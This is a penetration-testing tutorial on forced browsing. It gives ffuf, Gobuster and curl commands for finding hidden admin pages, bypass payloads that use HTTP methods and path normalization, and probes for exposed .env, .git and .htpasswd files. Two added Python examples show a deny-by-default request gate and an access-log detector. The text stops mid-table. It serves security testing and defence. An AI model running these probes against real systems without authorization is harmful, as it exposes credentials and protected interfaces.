bypassing-authentication-with-forced-browsing
Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.
# Bypassing Authentication with Forced Browsing
## When to Use
- During authorized penetration tests to discover hidden or unprotected administrative pages
- When testing whether authentication is consistently enforced across all application endpoints
- For identifying backup files, configuration files, and debug interfaces left exposed in production
- When assessing access control on API endpoints that should require authentication
- During security audits to validate that all sensitive resources enforce session validation
## Prerequisites
- **Authorization**: Written penetration testing agreement covering directory enumeration
- **ffuf**: Fast web fuzzer (`go install github.com/ffuf/ffuf/v2@latest`)
- **Gobuster**: Directory brute-force tool (`apt install gobuster`)
- **Burp Suite**: For intercepting and analyzing requests and responses
- **Wordlists**: SecLists collection (`git clone https://github.com/danielmiessler/SecLists.git`)
- **Target access**: Network connectivity and valid test credentials for authenticated comparison
## Workflow
### Step 1: Enumerate Hidden Directories and Files
Use ffuf or Gobuster to discover paths not linked in the application's navigation.
```bash
# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
    -mc 200,301,302,403 \
    -fc 404 \
    -o results-dirs.json -of json \
    -t 50 -rate 100

# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
    -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
    -mc 200,301,302,403 \
    -fc 404 \
    -o results-files.json -of json \
    -t 50 -rate 100

# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
    -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
    -s "200,204,301,302,307,403" \
    -x php,asp,aspx,jsp,html \
    -o gobuster-results.txt \
    -t 50
```
### Step 2: Discover Administrative and Debug Interfaces
Target common administrative paths and debug endpoints.
```bash
# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/common.txt \
    -mc 200,301,302 \
    -t 50 -rate 100

# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status

# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
    -mc 200,201,204,301,302,401,403 \
    -fc 404 \
    -o api-results.json -of json

# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
    curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
        "https://target.example.com/actuator/$endpoint"
done
```
### Step 3: Test Authentication Enforcement on Discovered Endpoints
Compare responses between unauthenticated and authenticated requests.
```bash
# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
    "https://target.example.com/admin/dashboard"

# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
    -b "session=valid_session_token_here" \
    "https://target.example.com/admin/dashboard"

# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
# Authenticated request
curl -s -b "session=valid_token" \
    "https://target.example.com/admin/users" | wc -c
# If both return similar content, authentication is not enforced

# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses
```
### Step 4: Test HTTP Method-Based Authentication Bypass
Some applications only enforce authentication for specific HTTP methods.
```bash
# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
    echo -n "$method: "
    curl -s -o /dev/null -w "%{http_code}" \
        -X "$method" "https://target.example.com/admin/settings"
done

# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
    -X POST \
    -H "X-HTTP-Method-Override: GET" \
    "https://target.example.com/admin/settings"

curl -s -o /dev/null -w "%{http_code}" \
    -H "X-Original-Method: GET" \
    -H "X-Rewrite-URL: /admin/settings" \
    "https://target.example.com/"
```
### Step 5: Test Path Traversal and URL Normalization Bypass
Exploit URL parsing differences to bypass path-based authentication rules.
```bash
# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
```
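The server-side control that closes Steps 3, 4 and 5 at once is a single gate that every request passes through before any handler runs: it canonicalizes the path the way the backend will resolve it, compares that against a deny-by-default allowlist, and never consults the HTTP method. The block below is an added example written for this page, not code from the original skill or from any framework; the allowlist contents and the `naive_prefix_allows` counterpart are assumptions chosen to show the difference. Each Step 5 variant from the page is run through both checks.

```python
"""Deny-by-default request gate with path canonicalization (added example).

Not code from the original skill page: a framework-independent sketch in
plain Python of the control that makes Steps 3, 4 and 5 fail. The path is
canonicalized before the access check, everything not explicitly public
needs a session, and the decision ignores the HTTP method and any
method-override header. The allowlist is hypothetical.
"""
import posixpath
from urllib.parse import unquote

# Hypothetical public allowlist, kept lowercase because canonicalize() case-folds.
PUBLIC_EXACT = {"/", "/login", "/robots.txt"}
PUBLIC_PREFIXES = ("/public/", "/static/")


def canonicalize(raw_path: str) -> str:
    """Reduce a request path to the single form the access check compares on."""
    path = raw_path
    # Decode until the result stops changing: %2561 -> %61 -> a (double encoding).
    previous = None
    while previous != path:
        previous, path = path, unquote(path)
    # A NUL terminates the path for most filesystem layers; cut there so a
    # tolerant parser cannot see "a different resource".
    path = path.split("\x00", 1)[0]
    # Drop per-segment path parameters (";anything", ".;") that some servers
    # ignore but a prefix check on the raw string does not.
    path = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    # Collapse ".", "..", repeated and trailing slashes; forcing exactly one
    # leading slash stops posixpath from keeping "//" as a distinct prefix.
    path = posixpath.normpath("/" + path.lstrip("/"))
    # Case-fold so /ADMIN/... cannot dodge a rule written for /admin/...
    return path.lower()


def naive_prefix_allows(raw_path: str) -> bool:
    """The weak pattern: compare the raw, un-normalized path against the allowlist."""
    return raw_path in PUBLIC_EXACT or raw_path.startswith(PUBLIC_PREFIXES)


def is_public(canonical_path: str) -> bool:
    return canonical_path in PUBLIC_EXACT or canonical_path.startswith(PUBLIC_PREFIXES)


def authorize(method: str, raw_path: str, session_valid: bool) -> int:
    """Return 200 if the request may reach its handler, 401 otherwise.

    `method` is accepted only to make the point visible: it is never consulted,
    so PUT, DELETE, TRACE or an X-HTTP-Method-Override header cannot change the
    outcome. Anything not on the public allowlist needs a valid session.
    """
    if is_public(canonicalize(raw_path)):
        return 200
    return 200 if session_valid else 401


# The Step 5 variants from the page, each run through both checks.
STEP5_VARIANTS = [
    "/admin/dashboard", "/ADMIN/dashboard", "/admin/./dashboard",
    "/public/../admin/dashboard", "/admin%2fdashboard", "/;/admin/dashboard",
    "/admin;anything/dashboard", "/.;/admin/dashboard", "/%2561dmin/dashboard",
    "/admin/dashboard/", "/admin/dashboard.json", "/admin/dashboard%00",
]

if __name__ == "__main__":
    for variant in STEP5_VARIANTS:
        print(f"{variant:30} canonical={canonicalize(variant):24} "
              f"naive_public={naive_prefix_allows(variant)!s:5} "
              f"gate={authorize('GET', variant, session_valid=False)}")
```

Note that `/admin/dashboard.json` needs no special casing: a deny-by-default gate refuses it simply because it is not on the allowlist, whereas a rule written as "protect `/admin/dashboard`" would have to enumerate every suffix. The `/public/../admin/dashboard` variant is the one where the raw-string check and the canonicalized check disagree.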
### Step 6: Discover Backup and Configuration Files
Search for sensitive files inadvertently exposed on the web server.
```bash
# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
    -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
    -e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
    -mc 200 -t 50 -rate 100

# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
            web.config wp-config.php.bak config.php.old \
            database.yml .htpasswd server-status phpinfo.php \
            robots.txt sitemap.xml crossdomain.xml; do
    status=$(curl -s -o /dev/null -w "%{http_code}" \
        "https://target.example.com/$file")
    if [ "$status" != "404" ]; then
        echo "FOUND ($status): $file"
    fi
done

# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed
```
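Seen from the server side, the enumeration in Steps 1, 2 and 6 leaves a distinctive trace: one client producing a large number of distinct paths that return 404 within a short window, and, when the assessment finds something, a 2xx for a file that should never be served at all. The block below is an added example, not part of the original skill, that turns those two observations into detection logic over access-log lines. It assumes the Combined Log Format; the sample lines, the client addresses, the 60-second window and the threshold of 20 distinct misses are all constructed for illustration.

```python
"""Detecting forced-browsing activity in web server access logs (added example).

Not part of the original skill page. Reads lines in the Combined Log Format
(an assumption about the logging setup) and raises two kinds of findings:
  * "enumeration": one client with at least `threshold` distinct 404 paths
    inside `window_seconds` (the footprint of the ffuf/Gobuster runs in
    Steps 1, 2 and 6);
  * "sensitive_hit": any 2xx for a path that should never be served on a
    production host (/.git/, /.env, /actuator/, ...), i.e. the Step 6 finding.
The sample log and thresholds below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Paths that should never answer 2xx in production (drawn from Steps 2 and 6).
SENSITIVE_PREFIXES = ("/.git/", "/.svn/", "/.env", "/.htpasswd",
                      "/actuator/", "/phpinfo.php", "/server-status")


def parse_line(line: str):
    """Return a dict for a well-formed line, or None for anything else."""
    match = LOG_RE.match(line)
    if not match:
        return None
    return {
        "ip": match["ip"],
        "ts": datetime.strptime(match["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": match["method"],
        "path": match["path"].split("?", 1)[0],  # query strings do not matter here
        "status": int(match["status"]),
    }


def detect(lines, window_seconds: int = 60, threshold: int = 20):
    """Return a list of findings, each a dict with kind, ip and detail."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    findings = []

    # 1. Sensitive paths that were actually served.
    for event in events:
        if 200 <= event["status"] < 300 and event["path"].startswith(SENSITIVE_PREFIXES):
            findings.append({"kind": "sensitive_hit", "ip": event["ip"],
                             "detail": event["path"]})

    # 2. Bursts of distinct 404s per client, measured over a sliding time window.
    misses = defaultdict(list)
    for event in events:
        if event["status"] == 404:
            misses[event["ip"]].append(event)
    for ip, hits in misses.items():
        start, best = 0, 0
        for end in range(len(hits)):
            while (hits[end]["ts"] - hits[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, len({h["path"] for h in hits[start:end + 1]}))
        if best >= threshold:
            findings.append({"kind": "enumeration", "ip": ip, "detail": best})
    return findings


def _line(ip, second, method, path, status, size):
    # Constructed sample line in Combined Log Format; not from a real server.
    return (f'{ip} - - [10/Mar/2025:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} {size} "-" "curl/8.5.0"')


# Wordlist-style names a scanner would try (constructed, overlaps with Step 2's list).
_PROBED = ["admin", "administrator", "backup", "old", "test", "dev", "staging",
           "console", "debug", "manager", "uploads", "tmp", "cgi-bin", "phpmyadmin",
           "adminer", "api", "swagger-ui", "graphql", "config", "wp-admin",
           "cpanel", "actuator"]

SAMPLE_LOG = (
    # a scanner: 22 distinct misses in 22 seconds, then one exposed file served
    [_line("203.0.113.7", i, "GET", f"/{name}", 404, 153) for i, name in enumerate(_PROBED)]
    + [_line("203.0.113.7", 25, "GET", "/.git/HEAD", 200, 23)]
    # an ordinary visitor: a few pages and one missing favicon
    + [_line("198.51.100.4", 5, "GET", "/", 200, 4821),
       _line("198.51.100.4", 9, "GET", "/login", 200, 1190),
       _line("198.51.100.4", 12, "GET", "/favicon.ico", 404, 153)]
)

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The distinct-path count, rather than a plain 404 count, is what separates a scanner from a visitor with one broken bookmark hammering reload; the sensitive-hit rule fires on status alone because a 2xx for `/.git/HEAD` is a finding regardless of who requested it.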
## Key Concepts
| Concept | Description |
|---------|-------------|
| **Forced Browsing** | Directly accessing URLs that are not linked but exist on the server |
| **Directory Enumeration** | Brute-forcing directory and file names against a wordlist to discover hidden content |
| **Authentication Bypass** | Accessing protected resources without valid credentials due to missing access checks |
| **Path Normalization** | Exploiting differences in how web servers and application frameworks parse URL paths |
| **Method-based Bypass** | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| **Information Disclosure** | Exposure of sensitive configuration files, backups, or debug interfaces |
| **Defense in Depth** | Layered security controls where authentication is enforced at multiple levels |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ffuf** | Fast web fuzzer for directory, file, and parameter enumeration |
| **Gobuster** | Directory and DNS brute-forcing tool written in Go |
| **Feroxbuster** | Recursive content discovery tool with automatic recursion |
| **DirBuster** | OWASP Java-based directory brute-force tool with GUI |
| **Burp Suite** | HTTP proxy for request |